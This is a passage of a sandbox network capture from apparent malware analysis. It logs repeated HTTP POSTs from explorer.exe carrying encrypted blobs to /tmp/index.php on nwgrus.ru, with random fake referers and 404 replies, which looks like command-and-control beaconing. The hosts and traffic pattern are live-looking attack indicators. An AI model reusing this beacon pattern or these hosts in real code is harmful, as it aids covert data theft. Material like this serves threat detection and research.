while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	65140	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:28:19.740135908 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kargncdaxawnud.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 232 Host: nwgrus.ru
Oct 13, 2024 18:28:19.740176916 CEST	232	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 28 6b 2c 90 f5 76 0b 75 30 38 ee 8a Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA -[(k,vu08v\F7R4PbFy6dPI^7F.Q=WZb{a}c 8 J2fIDk*
Oct 13, 2024 18:28:20.703269005 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:28:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	65270	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:25.655539989 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fmwnhyofuij.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 221 Host: nwgrus.ru
Oct 13, 2024 18:29:25.655575037 CEST	221	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 20 1e c1 bb Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu hM!4_$1>_pY .]f($+Df91:"vN9C]5#a\9uY]:LsL
Oct 13, 2024 18:29:26.607275963 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	65271	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:27.831768036 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rihjcvuphiddchm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 220 Host: nwgrus.ru
Oct 13, 2024 18:29:27.831768990 CEST	220	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 1d a0 a7 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuBVhfe qBssSYUW^H6%E#x=X7ptZs#<nX1-NK5oe
Oct 13, 2024 18:29:28.770073891 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	65272	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:29.091999054 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oqytxooojaw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 290 Host: nwgrus.ru
Oct 13, 2024 18:29:29.092036963 CEST	290	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4e 5e b2 83 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuN^[oWoUVbprl.l.+uW]4#b(ALaz]cp$r.M=arE13cQneM~^Xi@D{MGS6
Oct 13, 2024 18:29:30.032151937 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	65273	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:30.604149103 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vgkkdltoovhgj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 302 Host: nwgrus.ru
Oct 13, 2024 18:29:30.604204893 CEST	302	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 23 db fe Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuE#9YGUbcR%!tqYKb\|y1Z]j'af7NP-x9XDD1y883! yw][b8AwN3
Oct 13, 2024 18:29:31.548640966 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	65274	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:31.764997005 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://judwwmqxinxkj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 314 Host: nwgrus.ru
Oct 13, 2024 18:29:31.765028000 CEST	314	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 5c b7 8f Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuw\\)zZ{TU/;f\$nKRa6Wst9]2{&?LwU9;*gcr"3s70bB@\)lmbuk4}
Oct 13, 2024 18:29:32.705795050 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	65275	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:37.426177025 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tcjadfthgiofpvtt.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 361 Host: nwgrus.ru
Oct 13, 2024 18:29:37.426275969 CEST	361	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 44 bd 85 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu@DfNsS+:iytVle]J$"d8SBJx9t{W5KL/"y!55t7:llYNUVgFa
Oct 13, 2024 18:29:38.369604111 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	65276	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:42.459172010 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://phfffsllnpice.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 136 Host: nwgrus.ru
Oct 13, 2024 18:29:42.459172010 CEST	136	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 50 4c e4 84 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuPLd/DYFJoU20j,8k;n;Cy
Oct 13, 2024 18:29:43.415448904 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	65277	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:47.524832010 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ripegxsqlidtbjlk.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: nwgrus.ru
Oct 13, 2024 18:29:47.524864912 CEST	267	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 65 25 fa e7 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vue%xwxX";~g-]6>CwW=r^LMO}-JvR([Wo$&SbTt,P`DERrYc{E
Oct 13, 2024 18:29:48.485850096 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	65278	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:52.684465885 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://siolcmqbegyqsn.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 256 Host: nwgrus.ru
Oct 13, 2024 18:29:52.684540987 CEST	256	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 03 b6 ed Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu]pCQHKn`LFmLe98StMRG_H<F9IU=7R<d Y=g=k3U:Ak\|rEpwoF196
Oct 13, 2024 18:29:53.627422094 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	65279	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:29:58.718908072 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xwvgudwewoih.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 265 Host: nwgrus.ru
Oct 13, 2024 18:29:58.718909025 CEST	265	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 48 3e ff ac Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuH>JoX ]6\*+J=EV18(BF!3[Vq6d^>I\OSqnV$9M:E]~<Z=~MC-
Oct 13, 2024 18:29:59.680485964 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:29:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	65280	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:30:05.143635035 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cpcybixettuxhrkt.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 187 Host: nwgrus.ru
Oct 13, 2024 18:30:05.143667936 CEST	187	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 55 c3 91 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuUUo^XXU-}hc(o[#F@`Oh(Lne2Dc~.3
Oct 13, 2024 18:30:06.085484028 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	65281	148.230.249.9	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:30:11.316328049 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gixrpkowgjh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: nwgrus.ru
Oct 13, 2024 18:30:11.316346884 CEST	338	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 29 aa b5 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu&)`X`Ez:7YA;u]X_/z4Q3WvH' o)A'Z_J+SduP\Qcos7*TaeT#%
Oct 13, 2024 18:30:12.261116028 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	65282	190.156.239.49	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:30:20.015578032 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://voqchluhblp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 353 Host: nwgrus.ru
Oct 13, 2024 18:30:20.015578032 CEST	353	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 45 b7 9a Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu#Ebjez%^\W~-sATtt7U77Q/zN).wZ0Jv)ZJg758^E8gXcAsl)]A3
Oct 13, 2024 18:30:21.478468895 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Oct 13, 2024 18:30:21.478584051 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:20 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	65283	190.156.239.49	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:30:26.129671097 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wxvosrmogsfitpw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: nwgrus.ru
Oct 13, 2024 18:30:26.129710913 CEST	286	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 22 27 b8 f2 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu"'8ZtHd'c<;8PfZf/I^9<pxV"u#s;waCjQWuXeLSFy,h*Y = Od
Oct 13, 2024 18:30:27.201457977 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:27 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	65284	190.156.239.49	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:30:32.353360891 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pxipmfrupftaxri.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 220 Host: nwgrus.ru
Oct 13, 2024 18:30:32.353400946 CEST	220	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 1d f8 bf Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuoUWqm[xV+}.xA`h(<@e%S@u>bB.'bU]ipFM0)k
Oct 13, 2024 18:30:33.412847996 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:33 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	65285	190.156.239.49	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:30:38.908505917 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://piulubiplhrouqkj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 341 Host: nwgrus.ru
Oct 13, 2024 18:30:38.908505917 CEST	341	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 48 ca 8e Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vuJHQ^U)h!.d$n(k(D-4K< /N=)kv><vGA0aZ2onglpQ2
Oct 13, 2024 18:30:39.981079102 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	65286	190.156.239.49	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:30:44.559293985 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ynnjyahqefoad.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 216 Host: nwgrus.ru
Oct 13, 2024 18:30:44.559294939 CEST	216	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2f 54 c0 81 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu/TTh{%.e57k{"\|zCY?1SQA5<C>ESs1W8B=+sk/TTTf@
Oct 13, 2024 18:30:45.632917881 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sun, 13 Oct 2024 16:30:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	65287	190.156.239.49	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 13, 2024 18:30:50.969672918 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gtsvsrpyerihmcqc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 214 Host: nwgrus.ru
Oct 13, 2024 18:30:50.969698906 CEST	214	OUT	Data Raw: 3b 6e 51 61 80 c8 6e 27 de db b0 71 75 08 73 bc 0d 0d cc ed 19 74 91 6b 0d 7b 72 90 49 c1 b4 6f ed 5f c2 2f 73 6c 25 1c eb 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 39 50 dd f8 Data Ascii: ;nQan'qustk{rIo_/sl%? 9Yt M@NA .[k,vu9PTgU\?SzU!a{=I%e(g_W% ,(eH3l%w0CWxX\8)5
